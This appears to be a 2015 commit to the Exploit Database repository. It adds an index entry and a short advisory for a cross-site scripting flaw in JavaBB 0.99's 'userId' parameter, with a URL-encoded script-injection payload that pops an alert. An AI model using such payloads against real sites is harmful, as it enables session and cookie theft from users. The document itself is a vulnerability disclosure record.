DB: 2015-05-10

1 new exploits
This commit is contained in:
Offensive Security 2015-05-10 05:02:35 +00:00
parent e6dc3c025a
commit 5acc3a9713
2 changed files with 8 additions and 0 deletions

View file

@ -33317,6 +33317,7 @@ id,file,description,date,author,platform,type,port
36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 'id' Parameter Local File Include Vulnerability",2012-03-14,n0tch,php,webapps,0
36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service Vulnerability",2012-03-15,Rune,windows,dos,0
36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 'page2' Parameter SQL Injection Vulnerability",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0
36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 'userId' Parameter Cross Site Scripting Vulnerability",2012-03-18,sonyy,java,webapps,0
36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Include Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0
36925,platforms/php/webapps/36925.py,"elFinder 2 Remote Command Execution (Via File Creation) Vulnerability",2015-05-06,"TUNISIAN CYBER",php,webapps,0
36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection Vulnerability",2012-03-08,Mazt0r,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/52545/info
JavaBB is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/pm.externalSend.jbb?userId=42888&username=teapro%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E